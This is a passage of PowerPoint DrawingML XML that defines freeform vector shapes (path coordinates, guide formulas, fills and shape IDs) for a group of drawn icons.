                    <a:gd name="T3" fmla="*/ 84 h 87"/>
                    <a:gd name="T4" fmla="*/ 0 w 13"/>
                    <a:gd name="T5" fmla="*/ 0 h 87"/>
                    <a:gd name="T6" fmla="*/ 13 w 13"/>
                    <a:gd name="T7" fmla="*/ 4 h 87"/>
                    <a:gd name="T8" fmla="*/ 13 w 13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87">
                      <a:moveTo>
                        <a:pt x="13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3" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13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56" name="Freeform 836">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AFCD6A2-F281-464B-856B-A3020D8DF87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77" y="2705"/>
                  <a:ext cx="45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57" name="Freeform 837">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55424510-5B62-42BC-A805-D8DFD1FE3CF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77" y="2717"/>
                  <a:ext cx="45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58" name="Freeform 838">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4020A35A-D2AA-4D74-8D3D-9CD32E77263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35" y="2717"/>
                  <a:ext cx="42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4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59" name="Freeform 839">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61F7BFE3-19BF-4E94-9B19-260841757BA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977" y="2787"/>
                  <a:ext cx="597" cy="206"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 161 w 161"/>
                    <a:gd name="T1" fmla="*/ 43 h 56"/>
                    <a:gd name="T2" fmla="*/ 161 w 161"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 161"/>
                    <a:gd name="T5" fmla="*/ 12 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 161"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 161 w 161"/>
                    <a:gd name="T9" fmla="*/ 43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1" h="56">
                      <a:moveTo>
                        <a:pt x="161" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="56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61" y="43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60" name="Freeform 840">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D389CAD-7A4A-4918-9B90-DDF9911BF98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74" y="2866"/>
                  <a:ext cx="300" cy="127"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 81 w 81"/>
                    <a:gd name="T1" fmla="*/ 0 h 35"/>
                    <a:gd name="T2" fmla="*/ 81 w 81"/>
                    <a:gd name="T3" fmla="*/ 13 h 35"/>
                    <a:gd name="T4" fmla="*/ 0 w 81"/>
                    <a:gd name="T5" fmla="*/ 35 h 35"/>
                    <a:gd name="T6" fmla="*/ 0 w 81"/>
                    <a:gd name="T7" fmla="*/ 22 h 35"/>
                    <a:gd name="T8" fmla="*/ 81 w 8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35">
                      <a:moveTo>
                        <a:pt x="81" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="81" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22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61" name="Freeform 841">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00AB7931-C7A5-4399-9296-7AD1E8E8DA5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977" y="2705"/>
                  <a:ext cx="897" cy="240"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 242 w 242"/>
                    <a:gd name="T1" fmla="*/ 43 h 65"/>
                    <a:gd name="T2" fmla="*/ 161 w 242"/>
                    <a:gd name="T3" fmla="*/ 22 h 65"/>
                    <a:gd name="T4" fmla="*/ 161 w 242"/>
                    <a:gd name="T5" fmla="*/ 22 h 65"/>
                    <a:gd name="T6" fmla="*/ 81 w 242"/>
                    <a:gd name="T7" fmla="*/ 0 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 242"/>
                    <a:gd name="T9" fmla="*/ 22 h 65"/>
                    <a:gd name="T10" fmla="*/ 81 w 242"/>
                    <a:gd name="T11" fmla="*/ 44 h 65"/>
                    <a:gd name="T12" fmla="*/ 81 w 242"/>
                    <a:gd name="T13" fmla="*/ 44 h 65"/>
                    <a:gd name="T14" fmla="*/ 161 w 242"/>
                    <a:gd name="T15" fmla="*/ 65 h 65"/>
                    <a:gd name="T16" fmla="*/ 242 w 242"/>
                    <a:gd name="T17" fmla="*/ 43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2" h="65">
                      <a:moveTo>
                        <a:pt x="242" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="43"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="8E47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35" name="Group 842">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7146D552-3A98-4602-B2E4-1F310247BC3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16" y="1833"/>
                <a:ext cx="90" cy="70"/>
                <a:chOff x="2155" y="1811"/>
                <a:chExt cx="675" cy="523"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2242" name="Freeform 843">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B177440-C6C9-46A2-8C4B-BA530D5A161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90" y="1818"/>
                  <a:ext cx="314" cy="433"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4460"/>
                    <a:gd name="T1" fmla="*/ 0 h 6160"/>
                    <a:gd name="T2" fmla="*/ 0 w 4460"/>
                    <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                    <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                    <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                    <a:gd name="T8" fmla="*/ 0 w 4460"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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60" h="6160">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="6160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="11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43" name="Freeform 844">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDEE46B6-10D3-4128-9B12-7A80DDD33B7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3" y="1850"/>
                  <a:ext cx="268" cy="332"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3803"/>
                    <a:gd name="T1" fmla="*/ 0 h 4725"/>
                    <a:gd name="T2" fmla="*/ 0 w 3803"/>
                    <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                    <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                    <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                    <a:gd name="T8" fmla="*/ 0 w 3803"/>
                    <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="3711"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="4725"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="10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44" name="Freeform 845">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8C48F61-8C85-489D-94A5-73807833D26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90" y="1811"/>
                  <a:ext cx="340" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                    <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                    <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                    <a:gd name="T4" fmla="*/ 0 w 4831"/>
                    <a:gd name="T5" fmla="*/ 100 h 1288"/>
                    <a:gd name="T6" fmla="*/ 368 w 4831"/>
                    <a:gd name="T7" fmla="*/ 0 h 1288"/>
                    <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                      <a:moveTo>
                        <a:pt x="4831" y="1189"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4460" y="1288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4831" y="1189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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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45" name="Freeform 846">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D6A33C8-693F-4E5D-914B-AE1D5C61B4A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155" y="2127"/>
                  <a:ext cx="675" cy="181"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9603"/>
                    <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T3" fmla="*/ 0 h 2577"/>
                    <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                    <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                    <a:gd name="T8" fmla="*/ 0 w 9603"/>
                    <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                      <a:moveTo>
                        <a:pt x="0" y="1287"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4802" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9603" y="1287"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="2577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1287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46" name="Freeform 847">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF49724-3545-4297-B3E2-E2C0EC6AF17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93" y="2218"/>
                  <a:ext cx="337" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4801"/>
                    <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4801"/>
                    <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T5" fmla="*/ 369 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T7" fmla="*/ 0 h 1656"/>
                    <a:gd name="T8" fmla="*/ 0 w 4801"/>
                    <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                      <a:moveTo>
                        <a:pt x="0" y="1290"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1656"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="129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47" name="Freeform 848">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABEDF957-F4B1-40FB-8746-1FDD069B4AD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155" y="2218"/>
                  <a:ext cx="338" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4802"/>
                    <a:gd name="T3" fmla="*/ 369 h 1656"/>
                    <a:gd name="T4" fmla="*/ 0 w 4802"/>
                    <a:gd name="T5" fmla="*/ 0 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                      <a:moveTo>
                        <a:pt x="4802" y="1656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="1290"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="165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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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48" name="Freeform 849">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60BD138F-EE8F-42D9-A19C-2BD1D2FED96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51" y="2157"/>
                  <a:ext cx="457" cy="122"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 6492"/>
                    <a:gd name="T1" fmla="*/ 654 h 1743"/>
                    <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                    <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                    <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                    <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                    <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                    <a:gd name="T7" fmla="*/ 0 h 1743"/>
                    <a:gd name="T8" fmla="*/ 0 w 6492"/>
                    <a:gd name="T9" fmla="*/ 654 h 1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92" h="1743">
                      <a:moveTo>
                        <a:pt x="0" y="654"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4061" y="1743"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6492" y="1091"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2431" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="654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49" name="Freeform 850">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1268914-05F8-4F26-A454-C96C34A0707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04" y="1894"/>
                  <a:ext cx="26" cy="357"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 371"/>
                    <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                    <a:gd name="T2" fmla="*/ 371 w 371"/>
                    <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                    <a:gd name="T4" fmla="*/ 371 w 371"/>
                    <a:gd name="T5" fmla="*/ 0 h 5071"/>
                    <a:gd name="T6" fmla="*/ 0 w 371"/>
                    <a:gd name="T7" fmla="*/ 99 h 5071"/>
                    <a:gd name="T8" fmla="*/ 0 w 371"/>
                    <a:gd name="T9" fmla="*/ 5071 h 50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1" h="5071">
                      <a:moveTo>
                        <a:pt x="0" y="5071"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="371" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5071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36" name="Group 851">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45A17DD1-3647-4698-B7AD-391EE58A40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60" y="1819"/>
                <a:ext cx="110" cy="171"/>
                <a:chOff x="2158" y="1204"/>
                <a:chExt cx="419" cy="647"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2237" name="Freeform 852">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{994E077F-30C6-4EE3-8B15-D0CC355E7CA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94" y="1592"/>
                  <a:ext cx="177" cy="231"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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72549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38" name="Freeform 853">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C3C4DC-6498-4A30-A543-15A816FE26A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25" y="1575"/>
                  <a:ext cx="326" cy="276"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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72549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39" name="Freeform 854">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8F1189F-43EF-4C8D-AF8E-A3A377BAE2F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158" y="1323"/>
                  <a:ext cx="419" cy="329"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
